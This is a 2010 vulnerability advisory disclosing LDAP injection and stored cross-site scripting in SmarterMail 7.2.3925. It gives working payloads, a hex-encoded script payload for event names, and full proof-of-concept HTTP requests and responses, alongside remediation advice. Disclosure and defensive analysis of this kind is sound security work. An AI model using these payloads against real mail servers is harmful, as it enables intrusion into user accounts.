扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 |
######################################################################## # Vendor: smartertools.com SmarterMail 7.x (7.2.3925) # Date: 2010-10-01 # Author : David Hoyt (sqlhacker) – Hoyt LLC # Contact : h02332@gmail.com # Home : http://cloudscan.me # Dork : insite: SmarterMail Enterprise 7.2 # Bug : LDAP Injection + Cross Site Scripting (STORED) # Tested on : SmarterMail 7.x (7.2.3925) // Windows 2008 /64/R2 # Uncoordinated Disclosure ######################################################################## ABSTRACT -------------------------- It is important for application developers to penetration test their products prior to release in order to find potential vulnerabilities and correct them before fraudsters exploit them. DISCLOSURE PURPOSE -------------------------- Applications for wide-scale deployment must be delivered with an exploit surface that is manageable. Developers failing to properly screen applications prior to release are at risk of uncoordinated disclosure. SECURITY COMMENTS -------------------------- Server Application developers should explicitly be detailing the exploit surface modeling performed on an application as part of the software development lifecycle prior to and as part of a candidate release. System Admins need to take a trust-no-one approach when installing Server and Client Applications for wide-scale deployment. ENGAGEMENT TOOLS -------------------------- I am using Immunity Debugger, Burp Suite Pro 1.3.08, Netsparker, Metasploit, NeXpose, XSS_Rays, FuzzDB as a baseline set of engagement tools that are being used to perform this analysis. This is manual testing. DISCUSSION AND ANALYSIS -------------------------- SmarterMail 7.x (7.2.3925) was released on 10/1/2010 and was to have addressed a number of issues identified in CVE's http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-3425 and http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3486 There were a number of Private Advisories provided to Hoyt LLC Clients that were not disclosed to the public. It was our assumption that the level of detail and specificity would have resulted in a thourough scrubbing of any patches and release candidates. There are additional exploits to disclose that use a manual, multi-step process to confirm with picture proof. This advisory addresses LDAP Injection, Cross Site Scripting (STORED) and OS Injection vulnerabilities found in SmarterMail 7.x (7.2.3925). Additional advisories will be released as we develop a bullet proof audit trail. Further advisories will focus on security by obscurity in SmarterMail. My prior work focused on the URL/Parameter Combos that would deliver a Cross Site Scripting (STORED) exploit. My review seeks to focus on the identified URL/Param combos in SmarterMail 7.1 that were found to be vulnerable but not disclosed to the public and only available in private advisories to our clients and partners. AUDIT TRAIL + EXPLOIT PATTERN EXAMPLES EXPLOIT #1 -------------------------- LDAP injection and resulting STORED Cross Site Scripting in Events Planner - SmarterMail 7.x (7.2.3925) Summary Severity: High Confidence: Certain Host: http://vulnerable.smartermail.site:9998 Path: /Main/frmEmptyPreviewOuter.aspx Multiple Related URL/Parameters (available in private advisory) Issue detail The type parameter is vulnerable to LDAP injection attacks. The payloads 5faa0382d747b754)(sn=* and 5faa0382d747b754)!(sn=* were each submitted in the type parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner. Issue Background ----------------------- LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action. Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. The author has manually reviewed the reported requests and responses and confirmed a vulnerability is present. All the work presented is manual recon and analysis using the tools listed. Step by Step Process --------------------------------------------------- The steps to create the exploit as as follows: -Obtain an end-user SmarterMail 7.x (7.2.3925) -Login to WebMail, Click Events Note - The XSS attack payload can be delivered by creating an Event Group or an Event Name. My example will create a new event. I know that SmarterMail does some data sanitization, so I need to test various encoding schemes to get around the limited sanity checking. To make this easy to follow along, use URL http://ha.ckers.org/xss.html for our encoding calculator so the average Joe can leverage this exploit example. I want to make a simple test to confirm if the URL/Parameters are vulnerable in the Event Planner of SmarterMail 7.x (7.2.3925). I'll use a known malicious payload example. Using the encoding calculator, I input <\\\/script>alert(0x000170)<\\/script> and for the HEX Value Stored Cross Site Scripting exploit I want to create. The result is %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%30%78%30%30%30%31%37%30%29%3C%2F%73%63%72%69%70%74%3E, there is your example exploit for Stored XSS. Take the result and paste it into the new event name (exploit) you want to create and e-mail around to all your colleages and friends and blog about... Click submit and refresh the screen, here is what I "received" for a payload. I provide 2 examples of URL/Parameter manipulation that result in an event being created. ** Author Note.. the Blogger parser isn't very good about making me escape the nasty XSS below.. so I have to edit the post so readers don't get XSS'd.. Pictures are a part of the exploit surface model, I also like to post conclusive, picture proof of an exploit. The picture(s) below provide conclusive evidence of Cross Site Scripting (STORED) delivered via LDAP Injection. Stored Cross Site Scripting Audit Trail Picture #1 for SmarterMail 7.x (7.2.3925) LDAP Injection to leverage an XSS attack utilizing the event planner features of SmarterMail 7.x (7.2.3925) Stored Cross Site Scripting Audit Trail Picture #2 for SmarterMail 7.x (7.2.3925) LDAP Injection to leverage an XSS attack utilizing the event planner features of SmarterMail 7.x (7.2.3925) The implication here is that SmarterMail isn't defending against HEX Value malicious payloads. This is a "critical" exploit finding confirmed in SmarterMail 7.x (7.2.3925). You can keep testing with Decimal or Base 64 and produce results equal to and likely greater than what I am showing here in public, emphasis on greater than what I am showing. Issue Remediation ------------------- If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace. EXPLOIT Proof of Concept {PoC} - DETAILS -------------------------------------------- Request 1 GET /Main/frmEmptyPreviewOuter.aspx?type=5faa0382d747b754)(sn=* HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */* Referer: http://vulnerable.smartermail.site:9998/Default.aspx Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Encoding: gzip, deflate Host: vulnerable.smartermail.site:9998 Proxy-Connection: Keep-Alive Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserContacts"} Response 1 HTTP/2.0 200 OK Server: SmarterTools/2.0.3925.24451 Date: Fri, 01 Oct 2010 22:28:00 GMT X-AspNet-Version: 2.0.50727 X-Compressed-By: HttpCompress Cache-Control: private Content-Type: text/html; charset=utf-8 Connection: Close Content-Length: 5204 ...[SNIP]... <![CDATA[ UpdateSidebarCounts('UserSync', 0); $(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fMain\x2ffrmEmptyPreviewOuter\x2easpx?type\x3d5faa0382d747b754\x29\x28sn\x253d\x2a'); }); Sys.Application.initialize(); $(function() { SetTopTitle('No\x20item\x20has\x20been\x20selected\x20\x2d\x20hoytllc\x2ecom\x20\x2d\x20SmarterMail'); }); //]]> </script> </form> </body> </html> Request 2 GET /Main/frmEmptyPreviewOuter.aspx?type=5faa0382d747b754)!(sn=* HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */* Referer: http://vulnerable.smartermail.site:9998/Default.aspx Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Encoding: gzip, deflate Host: vulnerable.smartermail.site:9998 Proxy-Connection: Keep-Alive Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserContacts"} Response 2 HTTP/2.0 200 OK Server: SmarterTools/2.0.3925.24451 Date: Fri, 01 Oct 2010 22:28:00 GMT X-AspNet-Version: 2.0.50727 X-Compressed-By: HttpCompress Cache-Control: private Content-Type: text/html; charset=utf-8 Connection: Close Content-Length: 5247 ...[SNIP]... <![CDATA[ UpdateSidebarCounts('UserEmail', 0); UpdateSidebarCounts('UserSync', 0); $(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fMain\x2ffrmEmptyPreviewOuter\x2easpx?type\x3d5faa0382d747b754\x29\x21\x28sn\x253d\x2a'); }); Sys.Application.initialize(); $(function() { SetTopTitle('No\x20item\x20has\x20been\x20selected\x20\x2d\x20hoytllc\x2ecom\x20\x2d\x20SmarterMail'); }); //]]> EXPLOIT #2 -------------------------- Directory Creation by Fuzzing that results in a STORED Cross Site Scripting attack. This portion of the research focused on creating direcories that would evade the current filtering techniques used my SmarterMail to prevent OS Injection WORKAROUNDS -------------------------- Specifically, URL filtering should be employed against the malicious query strings. REMEDIATION SOLUTION ------------------------ I'm pushing a quick update to my clients now on this LDAP Injection / Stored XSS issue.. Our group is studying a remediation solution or additional workarounds that will be posted at this URL. Calender and Event functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include: Validating Input and a blacklist of strings to hinder this style of attack. There is more to the story.. since I'm just screening applications for clients, I am pushing out the info as I confirm it manually. |
体验盒子
